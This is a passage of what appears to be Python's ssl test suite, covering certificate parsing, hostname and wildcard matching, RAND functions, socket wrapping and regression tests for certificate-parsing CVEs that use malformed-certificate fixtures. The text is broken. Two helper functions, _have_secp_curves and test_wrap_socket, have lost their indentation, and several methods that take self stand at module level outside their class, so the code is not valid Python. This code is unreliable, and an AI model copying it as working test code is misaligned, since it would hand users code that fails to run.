SIGNED_CERTFILE_INFO = {
    'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
    'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
    'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
    'issuer': ((('countryName', 'XY'),),
               (('organizationName', 'Python Software Foundation CA'),),
               (('commonName', 'our-ca-server'),)),
    'notAfter': 'Jul 7 14:23:16 2028 GMT',
    'notBefore': 'Aug 29 14:23:16 2018 GMT',
    'serialNumber': 'CB2D80995A69525C',
    'subject': ((('countryName', 'XY'),),
                (('localityName', 'Castle Anthrax'),),
                (('organizationName', 'Python Software Foundation'),),
                (('commonName', 'localhost'),)),
    'subjectAltName': (('DNS', 'localhost'),),
    'version': 3
}

SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'

# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")

# Remote host used by network-dependent tests.
REMOTE_HOST = "self-signed.pythontest.net"

# Deliberately broken / missing fixtures for error-path tests.
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")

# Diffie-Hellman parameters.
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)

# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
    """Write the pending exception's formatted traceback to stdout when verbose."""
    exc_text = ' '.join(traceback.format_exception(*sys.exc_info()))
    if support.verbose:
        sys.stdout.write(prefix + exc_text)
def can_clear_options():
    """Return True when the SSL library (0.9.8m or higher) can clear options."""
    minimum = (0, 9, 8, 13, 15)
    return ssl._OPENSSL_API_VERSION >= minimum
def no_sslv2_implies_sslv3_hello():
    """Return True for OpenSSL 0.9.7h or higher."""
    minimum = (0, 9, 7, 8, 15)
    return ssl.OPENSSL_VERSION_INFO >= minimum
def have_verify_flags():
    """Return True for OpenSSL 0.9.8 or higher."""
    minimum = (0, 9, 8, 0, 15)
    return ssl.OPENSSL_VERSION_INFO >= minimum
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset():  # NOTE: ignore issues like #1647654
    """Return the local UTC offset in seconds (local time = utc time + offset)."""
    dst_active = time.daylight and time.localtime().tm_isdst > 0
    return -time.altzone if dst_active else -time.timezone
def asn1time(cert_time):
    """Normalize a certificate time string for OpenSSL builds that drop seconds.

    Some versions of OpenSSL ignore seconds, see #18207 (0.9.8i).
    """
    if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
        fmt = "%b %d %H:%M:%S %Y GMT"
        parsed = datetime.datetime.strptime(cert_time, fmt)
        cert_time = parsed.replace(second=0).strftime(fmt)
        # %d adds a leading zero but ASN1_TIME_print() uses a leading space
        if cert_time[4] == "0":
            cert_time = cert_time[:4] + " " + cert_time[5:]
    return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
    """Create a (client_context, server_context, hostname) triple for tests.

    Usage::

        client_context, server_context, hostname = testing_context()
    """
    if server_cert == SIGNED_CERTFILE:
        hostname = SIGNED_CERTFILE_HOSTNAME
    elif server_cert == SIGNED_CERTFILE2:
        hostname = SIGNED_CERTFILE2_HOSTNAME
    else:
        # Only the two known signed certificates are supported here.
        raise ValueError(server_cert)

    client_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    client_ctx.load_verify_locations(SIGNING_CA)

    server_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    server_ctx.load_cert_chain(server_cert)
    server_ctx.load_verify_locations(SIGNING_CA)

    return client_ctx, server_ctx, hostname
class BasicSocketTests(unittest.TestCase):
    def test_constants(self):
        # Presence checks: accessing a missing constant raises AttributeError.
        ssl.CERT_NONE
        ssl.CERT_OPTIONAL
        ssl.CERT_REQUIRED
        ssl.OP_CIPHER_SERVER_PREFERENCE
        ssl.OP_SINGLE_DH_USE
        if ssl.HAS_ECDH:
            ssl.OP_SINGLE_ECDH_USE
        if ssl.OPENSSL_VERSION_INFO >= (1, 0):
            ssl.OP_NO_COMPRESSION
        self.assertIn(ssl.HAS_SNI, {True, False})
        self.assertIn(ssl.HAS_ECDH, {True, False})
        ssl.OP_NO_SSLv2
        ssl.OP_NO_SSLv3
        ssl.OP_NO_TLSv1
        ssl.OP_NO_TLSv1_3
        if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
            ssl.OP_NO_TLSv1_1
            ssl.OP_NO_TLSv1_2
        # PROTOCOL_TLS and PROTOCOL_SSLv23 are aliases of each other.
        self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
    def test_private_init(self):
        # SSLSocket must be created through SSLContext.wrap_socket(),
        # never instantiated directly.
        with self.assertRaisesRegex(TypeError, "public constructor"):
            with socket.socket() as s:
                ssl.SSLSocket(s)
    def test_str_for_enums(self):
        # Make sure that the PROTOCOL_* constants have enum-like string
        # reprs.
        proto = ssl.PROTOCOL_TLS
        self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
        ctx = ssl.SSLContext(proto)
        # The context must report back the very same enum member.
        self.assertIs(ctx.protocol, proto)
    def test_random(self):
        # Exercise the RAND_* helpers exposed by the ssl module.
        v = ssl.RAND_status()
        if support.verbose:
            sys.stdout.write("\n RAND_status is %d (%s)\n"
                             % (v, (v and "sufficient randomness") or
                                "insufficient randomness"))

        data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
        self.assertEqual(len(data), 16)
        # RAND_pseudo_bytes output is cryptographic iff the PRNG is seeded.
        self.assertEqual(is_cryptographic, v == 1)
        if v:
            data = ssl.RAND_bytes(16)
            self.assertEqual(len(data), 16)
        else:
            self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)

        # negative num is invalid
        self.assertRaises(ValueError, ssl.RAND_bytes, -5)
        self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)

        if hasattr(ssl, 'RAND_egd'):
            self.assertRaises(TypeError, ssl.RAND_egd, 1)
            self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
        # RAND_add accepts str, bytes and bytearray seed material.
        ssl.RAND_add("this is a random string", 75.0)
        ssl.RAND_add(b"this is a random bytes object", 75.0)
        ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
    @unittest.skipUnless(os.name == 'posix', 'requires posix')
    def test_random_fork(self):
        # After fork(), parent and child must not produce identical
        # PRNG output (the child pipes its bytes back for comparison).
        status = ssl.RAND_status()
        if not status:
            self.fail("OpenSSL's PRNG has insufficient randomness")

        rfd, wfd = os.pipe()
        pid = os.fork()
        if pid == 0:
            # Child: draw 16 pseudo-random bytes and ship them to the parent.
            try:
                os.close(rfd)
                child_random = ssl.RAND_pseudo_bytes(16)[0]
                self.assertEqual(len(child_random), 16)
                os.write(wfd, child_random)
                os.close(wfd)
            except BaseException:
                os._exit(1)
            else:
                os._exit(0)
        else:
            # Parent: wait for the child, then compare its bytes with ours.
            os.close(wfd)
            self.addCleanup(os.close, rfd)
            _, status = os.waitpid(pid, 0)
            self.assertEqual(status, 0)

            child_random = os.read(rfd, 16)
            self.assertEqual(len(child_random), 16)
            parent_random = ssl.RAND_pseudo_bytes(16)[0]
            self.assertEqual(len(parent_random), 16)

            self.assertNotEqual(child_random, parent_random)
    # Show full diffs when the big dict comparisons below fail.
    maxDiff = None

    def test_parse_cert(self):
        # note that this uses an 'unofficial' function in _ssl.c,
        # provided solely for this test, to exercise the certificate
        # parsing code
        self.assertEqual(
            ssl._ssl._test_decode_cert(CERTFILE),
            CERTFILE_INFO
        )
        self.assertEqual(
            ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
            SIGNED_CERTFILE_INFO
        )

        # Issue #13034: the subjectAltName in some certificates
        # (notably projects.developer.nokia.com:443) wasn't parsed
        p = ssl._ssl._test_decode_cert(NOKIACERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['subjectAltName'],
                         (('DNS', 'projects.developer.nokia.com'),
                          ('DNS', 'projects.forum.nokia.com'))
                         )
        # extra OCSP and AIA fields
        self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
        self.assertEqual(p['caIssuers'],
                         ('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
        self.assertEqual(p['crlDistributionPoints'],
                         ('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
    def test_parse_cert_CVE_2019_5010(self):
        # Cert with an invalid CRL distribution point (TALOS-2019-0758):
        # decoding must succeed, and the expected result carries no
        # 'crlDistributionPoints' key.
        p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(
            p,
            {
                'issuer': (
                    (('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
                'notAfter': 'Jun 14 18:00:58 2028 GMT',
                'notBefore': 'Jun 18 18:00:58 2018 GMT',
                'serialNumber': '02',
                'subject': ((('countryName', 'UK'),),
                            (('commonName',
                              'codenomicon-vm-2.test.lal.cisco.com'),)),
                'subjectAltName': (
                    ('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
                'version': 3
            }
        )
    def test_parse_cert_CVE_2013_4238(self):
        # Embedded NUL bytes in subject/issuer/SAN fields must survive
        # decoding intact (CVE-2013-4238).
        p = ssl._ssl._test_decode_cert(NULLBYTECERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        subject = ((('countryName', 'US'),),
                   (('stateOrProvinceName', 'Oregon'),),
                   (('localityName', 'Beaverton'),),
                   (('organizationName', 'Python Software Foundation'),),
                   (('organizationalUnitName', 'Python Core Development'),),
                   (('commonName', 'null.python.org\x00example.org'),),
                   (('emailAddress', 'python-dev@python.org'),))
        self.assertEqual(p['subject'], subject)
        self.assertEqual(p['issuer'], subject)
        if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
        else:
            # OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '<invalid>'))
        self.assertEqual(p['subjectAltName'], san)
    def test_parse_all_sans(self):
        # ALLSANFILE carries every supported kind of subjectAltName entry.
        p = ssl._ssl._test_decode_cert(ALLSANFILE)
        self.assertEqual(p['subjectAltName'],
            (
                ('DNS', 'allsans'),
                ('othername', '<unsupported>'),
                ('othername', '<unsupported>'),
                ('email', 'user@example.org'),
                ('DNS', 'www.example.org'),
                ('DirName',
                    ((('countryName', 'XY'),),
                    (('localityName', 'Castle Anthrax'),),
                    (('organizationName', 'Python Software Foundation'),),
                    (('commonName', 'dirname example'),))),
                ('URI', 'https://www.python.org/'),
                ('IP Address', '127.0.0.1'),
                ('IP Address', '0:0:0:0:0:0:0:1\n'),
                ('Registered ID', '1.2.3.4.5')
            )
        )
    def test_DER_to_PEM(self):
        # Round-trip PEM -> DER -> PEM -> DER; the DER form must be stable
        # and the regenerated PEM must carry the standard header/footer.
        with open(CAFILE_CACERT, 'r') as f:
            pem = f.read()
        d1 = ssl.PEM_cert_to_DER_cert(pem)
        p2 = ssl.DER_cert_to_PEM_cert(d1)
        d2 = ssl.PEM_cert_to_DER_cert(p2)
        self.assertEqual(d1, d2)
        if not p2.startswith(ssl.PEM_HEADER + '\n'):
            self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
        if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
            self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
    def test_openssl_version(self):
        # Consistency checks across the three OPENSSL_VERSION* attributes.
        n = ssl.OPENSSL_VERSION_NUMBER
        t = ssl.OPENSSL_VERSION_INFO
        s = ssl.OPENSSL_VERSION
        self.assertIsInstance(n, int)
        self.assertIsInstance(t, tuple)
        self.assertIsInstance(s, str)
        # Some sanity checks follow
        # >= 0.9
        self.assertGreaterEqual(n, 0x900000)
        # < 3.0
        self.assertLess(n, 0x30000000)
        major, minor, fix, patch, status = t
        self.assertGreaterEqual(major, 0)
        self.assertLess(major, 3)
        self.assertGreaterEqual(minor, 0)
        self.assertLess(minor, 256)
        self.assertGreaterEqual(fix, 0)
        self.assertLess(fix, 256)
        self.assertGreaterEqual(patch, 0)
        self.assertLessEqual(patch, 63)
        self.assertGreaterEqual(status, 0)
        self.assertLessEqual(status, 15)
        # Version string as returned by {Open,Libre}SSL, the format might change
        if IS_LIBRESSL:
            self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
                            (s, t, hex(n)))
        else:
            self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
                            (s, t, hex(n)))
    @support.cpython_only
    def test_refcycle(self):
        # Issue #7943: an SSL object doesn't create reference cycles with
        # itself: once the last reference is dropped, the weakref dies too.
        s = socket.socket(socket.AF_INET)
        ss = test_wrap_socket(s)
        wr = weakref.ref(ss)
        with support.check_warnings(("", ResourceWarning)):
            del ss
            self.assertEqual(wr(), None)
    def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
        s = socket.socket(socket.AF_INET)
        with test_wrap_socket(s) as ss:
            self.assertRaises(OSError, ss.recv, 1)
            self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
            self.assertRaises(OSError, ss.recvfrom, 1)
            self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
            self.assertRaises(OSError, ss.send, b'x')
            self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
            # These operations are unsupported on SSL sockets altogether.
            self.assertRaises(NotImplementedError, ss.dup)
            self.assertRaises(NotImplementedError, ss.sendmsg,
                              [b'x'], (), 0, ('0.0.0.0', 0))
            self.assertRaises(NotImplementedError, ss.recvmsg, 100)
            self.assertRaises(NotImplementedError, ss.recvmsg_into,
                              [bytearray(100)])
    def test_timeout(self):
        # Issue #8524: when creating an SSL socket, the timeout of the
        # original socket should be retained.
        for timeout in (None, 0.0, 5.0):
            s = socket.socket(socket.AF_INET)
            s.settimeout(timeout)
            with test_wrap_socket(s) as ss:
                self.assertEqual(timeout, ss.gettimeout())
    def test_errors_sslwrap(self):
        # Argument validation in the module-level ssl.wrap_socket() helper.
        sock = socket.socket()
        self.assertRaisesRegex(ValueError,
                               "certfile must be specified",
                               ssl.wrap_socket, sock, keyfile=CERTFILE)
        self.assertRaisesRegex(ValueError,
                               "certfile must be specified for server-side operations",
                               ssl.wrap_socket, sock, server_side=True)
        self.assertRaisesRegex(ValueError,
                               "certfile must be specified for server-side operations",
                               ssl.wrap_socket, sock, server_side=True, certfile="")
        with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
            self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
                                   s.connect, (HOST, 8080))
        # Missing certificate / key files surface as OSError with ENOENT.
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock,
                                certfile=CERTFILE, keyfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock,
                                certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
    def bad_cert_test(self, certfile):
        """Check that trying to use the given client certificate fails.

        *certfile* is resolved relative to this module's directory; the
        wrap attempt must raise ssl.SSLError.
        """
        certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
                                certfile)
        sock = socket.socket()
        self.addCleanup(sock.close)
        with self.assertRaises(ssl.SSLError):
            test_wrap_socket(sock,
                             certfile=certfile)

    def test_empty_cert(self):
        """Wrapping with an empty cert file"""
        self.bad_cert_test("nullcert.pem")

    def test_malformed_cert(self):
        """Wrapping with a badly formatted certificate (syntax error)"""
        self.bad_cert_test("badcert.pem")

    def test_malformed_key(self):
        """Wrapping with a badly formatted key (syntax error)"""
        self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
    """Exercise ssl.match_hostname(): plain DNS names, wildcard rules,
    IDNA labels, subjectAltName precedence, and IP address entries.
    """
    def ok(cert, hostname):
        # helper: the match must succeed (i.e. not raise)
        ssl.match_hostname(cert, hostname)
    def fail(cert, hostname):
        # helper: the match must raise CertificateError
        self.assertRaises(ssl.CertificateError,
                          ssl.match_hostname, cert, hostname)
    # -- Hostname matching --
    cert = {'subject': ((('commonName', 'example.com'),),)}
    ok(cert, 'example.com')
    ok(cert, 'ExAmple.cOm')  # matching is case-insensitive
    fail(cert, 'www.example.com')
    fail(cert, '.example.com')
    fail(cert, 'example.org')
    fail(cert, 'exampleXcom')
    cert = {'subject': ((('commonName', '*.a.com'),),)}
    ok(cert, 'foo.a.com')
    fail(cert, 'bar.foo.a.com')
    fail(cert, 'a.com')
    fail(cert, 'Xa.com')
    fail(cert, '.a.com')
    # only match wildcards when they are the only thing
    # in left-most segment
    cert = {'subject': ((('commonName', 'f*.com'),),)}
    fail(cert, 'foo.com')
    fail(cert, 'f.com')
    fail(cert, 'bar.com')
    fail(cert, 'foo.a.com')
    fail(cert, 'bar.foo.com')
    # NULL bytes are bad, CVE-2013-4073
    cert = {'subject': ((('commonName',
                          'null.python.org\x00example.org'),),)}
    ok(cert, 'null.python.org\x00example.org') # or raise an error?
    fail(cert, 'example.org')
    fail(cert, 'null.python.org')
    # error cases with wildcards
    cert = {'subject': ((('commonName', '*.*.a.com'),),)}
    fail(cert, 'bar.foo.a.com')
    fail(cert, 'a.com')
    fail(cert, 'Xa.com')
    fail(cert, '.a.com')
    cert = {'subject': ((('commonName', 'a.*.com'),),)}
    fail(cert, 'a.foo.com')
    fail(cert, 'a..com')
    fail(cert, 'a.com')
    # wildcard doesn't match IDNA prefix 'xn--'
    idna = 'püthon.python.org'.encode("idna").decode("ascii")
    cert = {'subject': ((('commonName', idna),),)}
    ok(cert, idna)
    cert = {'subject': ((('commonName', 'x*.python.org'),),)}
    fail(cert, idna)
    cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
    fail(cert, idna)
    # wildcard in first fragment and IDNA A-labels in sequent fragments
    # are supported.
    idna = 'www*.pythön.org'.encode("idna").decode("ascii")
    cert = {'subject': ((('commonName', idna),),)}
    fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
    fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
    fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
    fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
    # Slightly fake real-world example
    cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
            'subject': ((('commonName', 'linuxfrz.org'),),),
            'subjectAltName': (('DNS', 'linuxfr.org'),
                               ('DNS', 'linuxfr.com'),
                               ('othername', '<unsupported>'))}
    ok(cert, 'linuxfr.org')
    ok(cert, 'linuxfr.com')
    # Not a "DNS" entry
    fail(cert, '<unsupported>')
    # When there is a subjectAltName, commonName isn't used
    fail(cert, 'linuxfrz.org')
    # A pristine real-world example
    cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
            'subject': ((('countryName', 'US'),),
                        (('stateOrProvinceName', 'California'),),
                        (('localityName', 'Mountain View'),),
                        (('organizationName', 'Google Inc'),),
                        (('commonName', 'mail.google.com'),))}
    ok(cert, 'mail.google.com')
    fail(cert, 'gmail.com')
    # Only commonName is considered
    fail(cert, 'California')
    # -- IPv4 matching --
    cert = {'subject': ((('commonName', 'example.com'),),),
            'subjectAltName': (('DNS', 'example.com'),
                               ('IP Address', '10.11.12.13'),
                               ('IP Address', '14.15.16.17'),
                               ('IP Address', '127.0.0.1'))}
    ok(cert, '10.11.12.13')
    ok(cert, '14.15.16.17')
    # socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
    fail(cert, '127.1')
    fail(cert, '14.15.16.17 ')
    fail(cert, '14.15.16.17 extra data')
    fail(cert, '14.15.16.18')
    fail(cert, 'example.net')
    # -- IPv6 matching --
    if support.IPV6_ENABLED:
        cert = {'subject': ((('commonName', 'example.com'),),),
                'subjectAltName': (
                    ('DNS', 'example.com'),
                    ('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
                    ('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
        ok(cert, '2001::cafe')
        ok(cert, '2003::baba')
        fail(cert, '2003::baba ')
        fail(cert, '2003::baba extra data')
        fail(cert, '2003::bebe')
        fail(cert, 'example.net')
    # -- Miscellaneous --
    # Neither commonName nor subjectAltName
    cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
            'subject': ((('countryName', 'US'),),
                        (('stateOrProvinceName', 'California'),),
                        (('localityName', 'Mountain View'),),
                        (('organizationName', 'Google Inc'),))}
    fail(cert, 'mail.google.com')
    # No DNS entry in subjectAltName but a commonName
    cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
            'subject': ((('countryName', 'US'),),
                        (('stateOrProvinceName', 'California'),),
                        (('localityName', 'Mountain View'),),
                        (('commonName', 'mail.google.com'),)),
            'subjectAltName': (('othername', 'blabla'), )}
    ok(cert, 'mail.google.com')
    # No DNS entry subjectAltName and no commonName
    cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
            'subject': ((('countryName', 'US'),),
                        (('stateOrProvinceName', 'California'),),
                        (('localityName', 'Mountain View'),),
                        (('organizationName', 'Google Inc'),)),
            'subjectAltName': (('othername', 'blabla'),)}
    fail(cert, 'google.com')
    # Empty cert / no cert
    self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
    self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
    # Issue #17980: avoid denials of service by refusing more than one
    # wildcard per fragment.
    cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
    with self.assertRaisesRegex(
            ssl.CertificateError,
            "partial wildcards in leftmost label are not supported"):
        ssl.match_hostname(cert, 'axxb.example.com')
    cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
    with self.assertRaisesRegex(
            ssl.CertificateError,
            "wildcard can only be present in the leftmost label"):
        ssl.match_hostname(cert, 'www.sub.example.com')
    cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
    with self.assertRaisesRegex(
            ssl.CertificateError,
            "too many wildcards"):
        ssl.match_hostname(cert, 'axxbxxc.example.com')
    cert = {'subject': ((('commonName', '*'),),)}
    with self.assertRaisesRegex(
            ssl.CertificateError,
            "sole wildcard without additional labels are not support"):
        ssl.match_hostname(cert, 'host')
    cert = {'subject': ((('commonName', '*.com'),),)}
    with self.assertRaisesRegex(
            ssl.CertificateError,
            r"hostname 'com' doesn't match '\*.com'"):
        ssl.match_hostname(cert, 'com')
    # extra checks for _inet_paton()
    for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
        with self.assertRaises(ValueError):
            ssl._inet_paton(invalid)
    for ipaddr in ['127.0.0.1', '192.168.0.1']:
        self.assertTrue(ssl._inet_paton(ipaddr))
    if support.IPV6_ENABLED:
        for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
            self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
    """server_hostname is rejected when wrapping in server-side mode."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    with socket.socket() as plain_sock:
        with self.assertRaises(ValueError):
            context.wrap_socket(plain_sock, True,
                                server_hostname="some.hostname")
def test_unknown_channel_binding(self):
    """get_channel_binding() must raise ValueError for an unknown type."""
    s = socket.create_server(('127.0.0.1', 0))
    # Bug fix: the original closed *s* with a trailing s.close(), which is
    # skipped when an assertion fails and leaks the listening socket.
    # addCleanup guarantees closure on every exit path.
    self.addCleanup(s.close)
    c = socket.socket(socket.AF_INET)
    c.connect(s.getsockname())
    # the wrapped socket's context manager closes c on exit
    with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
        with self.assertRaises(ValueError):
            ss.get_channel_binding("unknown-type")
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
                     "'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
    """An unconnected socket reports None for the 'tls-unique' binding."""
    # client-side: no handshake has happened, so no binding data
    with test_wrap_socket(socket.socket(socket.AF_INET)) as ss:
        self.assertIsNone(ss.get_channel_binding("tls-unique"))
    # server-side behaves identically
    with test_wrap_socket(socket.socket(socket.AF_INET),
                          server_side=True, certfile=CERTFILE) as ss:
        self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
    """Dropping the last reference to an unclosed SSL socket must emit a
    ResourceWarning whose message names the socket."""
    ss = test_wrap_socket(socket.socket(socket.AF_INET))
    r = repr(ss)
    with self.assertWarns(ResourceWarning) as cm:
        ss = None
        # force a collection so the warning fires deterministically
        support.gc_collect()
    self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
    """get_default_verify_paths() honours SSL_CERT_DIR / SSL_CERT_FILE."""
    defaults = ssl.get_default_verify_paths()
    self.assertEqual(len(defaults), 6)
    self.assertIsInstance(defaults, ssl.DefaultVerifyPaths)
    with support.EnvironmentVarGuard() as env:
        env["SSL_CERT_DIR"] = CAPATH
        env["SSL_CERT_FILE"] = CERTFILE
        overridden = ssl.get_default_verify_paths()
        self.assertEqual(overridden.cafile, CERTFILE)
        self.assertEqual(overridden.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
    """ssl.enum_certificates() yields (cert, encoding, trust) triples from
    the Windows "CA" and "ROOT" system stores."""
    self.assertTrue(ssl.enum_certificates("CA"))
    self.assertTrue(ssl.enum_certificates("ROOT"))
    # a store name is mandatory and must be non-empty
    self.assertRaises(TypeError, ssl.enum_certificates)
    self.assertRaises(WindowsError, ssl.enum_certificates, "")
    trust_oids = set()
    for storename in ("CA", "ROOT"):
        store = ssl.enum_certificates(storename)
        self.assertIsInstance(store, list)
        for element in store:
            self.assertIsInstance(element, tuple)
            self.assertEqual(len(element), 3)
            cert, enc, trust = element
            self.assertIsInstance(cert, bytes)
            self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
            # trust is either a set of purpose OIDs or a boolean
            self.assertIsInstance(trust, (set, bool))
            if isinstance(trust, set):
                trust_oids.update(trust)
    # the serverAuth purpose OID must appear somewhere in the stores
    serverAuth = "1.3.6.1.5.5.7.3.1"
    self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
    """ssl.enum_crls() returns (blob, encoding) tuples from the CA store."""
    self.assertTrue(ssl.enum_crls("CA"))
    self.assertRaises(TypeError, ssl.enum_crls)
    self.assertRaises(WindowsError, ssl.enum_crls, "")
    crls = ssl.enum_crls("CA")
    self.assertIsInstance(crls, list)
    for entry in crls:
        self.assertIsInstance(entry, tuple)
        self.assertEqual(len(entry), 2)
        blob, encoding = entry
        self.assertIsInstance(blob, bytes)
        self.assertIn(encoding, {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
    """ssl._ASN1Object lookups by OID, NID and name must all agree."""
    expected = (129, 'serverAuth', 'TLS Web Server Authentication',
                '1.3.6.1.5.5.7.3.1')
    val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
    self.assertEqual(val, expected)
    self.assertEqual(val.nid, 129)
    self.assertEqual(val.shortname, 'serverAuth')
    self.assertEqual(val.longname, 'TLS Web Server Authentication')
